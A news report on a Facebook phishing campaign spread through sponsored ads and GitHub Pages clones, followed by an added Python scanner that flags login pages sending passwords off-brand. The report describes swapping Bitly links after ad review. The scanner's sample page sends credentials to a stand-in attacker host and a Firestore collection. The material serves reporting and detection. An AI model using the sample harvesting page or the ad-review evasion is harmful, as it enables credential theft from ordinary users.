Researchers at Nepalese cybersecurity firm ThreatNix have discovered a widespread phishing campaign targeting Nepal, the Philippines, Egypt and numerous other countries.
The researchers first spotted the campaign when they observed a sponsored Facebook post offering 3GB of mobile data from a Nepalese telecom provider.
Facebook ads and GitHub Pages appear to be the latest route chosen by attackers to phish for and steal the credentials of Facebook users.
It is estimated that the campaign may already have hit at least 50 countries and over 615,000 users, and the number of victims appears to be growing at a rapid pace of 100 victims per minute.
Once the ad was clicked, it led to a phishing site hosted on a GitHub page. These pages closely mimicked the original login page and were nearly impossible to tell apart from the genuine one.
How does the attack work?
The phishing sites mimicked the Facebook login page and stole the unwary victims' credentials, which were then sent to two endpoints: a Firestore database and a domain owned by the phishing group.
Facebook does a great deal to ensure such phishing pages are rejected for ads; in this case, the attackers were clever and managed to find a loophole in the process. They used Bitly links that pointed to a benign page while the ad was under review, and once the ad was approved, the link was changed to point to the phishing page.
The domain is registered and hosted at GoDaddy and was registered on 3rd April 2020. Four other domains have also been identified and linked to this scam.
Almost 500 GitHub repositories containing phishing pages were found. It is possible that similar tactics were used earlier, as the oldest of these pages date back five months, and some of the repositories have been deleted.
ThreatNix is working with the concerned authorities to track these attackers and take down the malicious phishing pages. No further details have been released yet, as this is an ongoing investigation.
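The behaviour described above, a login page that looks like Facebook's but submits credentials to a Firestore database and an attacker-owned domain, is what a defender's page scanner should catch. The following is an added example, not code from ThreatNix or from the article: it parses a page's HTML, finds login forms and any URLs referenced from inline scripts, and flags every submission or fetch target whose host is not on the brand's allowlist. The allowlist, the constructed sample page and its hostnames (`exfil.example.invalid`, a GitHub Pages URL and a Firestore document path with a placeholder project name) are all assumptions made for the demonstration.

```python
"""Flag credential-harvesting pages: a login form styled like a known brand
whose credentials are sent somewhere the brand would never send them.

Added example (not the article's or ThreatNix's code); hostnames below are
constructed for the demo.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumption: the only hosts a genuine Facebook login form may submit to.
ALLOWED_HOSTS = {"facebook.com", "www.facebook.com", "m.facebook.com"}

# Absolute URLs inside inline <script> blocks (fetch(), XMLHttpRequest, etc.).
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")


class _LoginPageCollector(HTMLParser):
    """Collect form actions, password inputs and inline script text."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.script_text = []
        self.has_password_field = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A missing action means "submit to the page's own URL".
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password_field = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)


def _host_allowed(host):
    host = (host or "").lower()
    return any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS)


def find_exfil_endpoints(html, page_url):
    """Return (has_password_field, sorted list of off-brand targets).

    Form actions are resolved against page_url, so a relative action on a
    page hosted outside the brand's domain is flagged as well.
    """
    collector = _LoginPageCollector()
    collector.feed(html)
    suspicious = set()
    for action in collector.form_actions:
        target = urljoin(page_url, action)
        if not _host_allowed(urlparse(target).hostname):
            suspicious.add(target)
    for url in URL_RE.findall("\n".join(collector.script_text)):
        if not _host_allowed(urlparse(url).hostname):
            suspicious.add(url)
    return collector.has_password_field, sorted(suspicious)


def is_credential_phish(html, page_url):
    """True when the page asks for a password and ships it off-brand."""
    has_password, endpoints = find_exfil_endpoints(html, page_url)
    return has_password and bool(endpoints)


# Constructed sample: a GitHub Pages-hosted clone posting to an attacker
# domain and to a Firestore document collection (placeholder project name).
SAMPLE_PAGE_URL = "https://example-user.github.io/login/"
SAMPLE_HTML = """
<html><body>
<form method="post" action="https://exfil.example.invalid/collect.php">
  <input name="email"><input type="password" name="pass">
  <button>Log In</button>
</form>
<script>
  fetch("https://firestore.googleapis.com/v1/projects/example-project/databases/(default)/documents/victims",
        {method: "POST", body: JSON.stringify({e: email, p: pass})});
</script>
</body></html>
"""

if __name__ == "__main__":
    has_pw, targets = find_exfil_endpoints(SAMPLE_HTML, SAMPLE_PAGE_URL)
    print("password field:", has_pw)
    for t in targets:
        print("off-brand target:", t)
    print("verdict:", "PHISH" if is_credential_phish(SAMPLE_HTML, SAMPLE_PAGE_URL) else "ok")
```

Resolving relative form actions against the page URL is deliberate: a clone hosted on a GitHub Pages domain with `action="/login.php"` still sends the password to the wrong host, and the check reports it without needing an explicit attacker domain in the HTML.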